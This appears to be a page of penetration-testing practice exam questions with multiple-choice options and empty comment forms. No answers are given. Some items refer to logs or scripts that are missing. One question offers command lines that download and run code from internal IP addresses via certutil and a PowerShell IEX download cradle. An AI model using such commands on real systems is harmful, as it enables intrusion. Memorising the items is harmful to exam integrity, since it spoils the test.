During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.

Which of the following vulnerabilities was the attacker trying to exploit?

• A...Session hijacking
• B...URL manipulation
• C...SQL injection
• D...Insecure direct object reference

Comment: *

Name: *

Email: *

Verification: *

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

• A.Weak authentication schemes
• B.Credentials stored in strings
• C.Buffer overflows
• D.Non-optimized resource management

Comment: *

Name: *

Email: *

Verification: *

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access.
Which of the following commands should the penetration tester use?

• A.powershell.exe impo C:\tools\foo.ps1
• B.certutil.exe -f https://192.168.0.1/foo.exe bad.exe
• C.powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
• D.rundll32.exe c:\path\foo.dll,functName

Comment: *

Name: *

Email: *

Verification: *

A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

• A.Default web configurations
• B.Open web ports on a host
• C.Supported HTTP methods
• D.Listening web servers in a domain

Comment: *

Name: *

Email: *

Verification: *

A penetration tester assesses an application allow list and has limited command-line access on the Windows system. Which of the following would give the penetration tester information that could aid in continuing the test?

• A.mmc.exe
• B.icacls.exe
• C.nltest.exe
• D.rundll.exe

Comment: *

Name: *

Email: *

Verification: *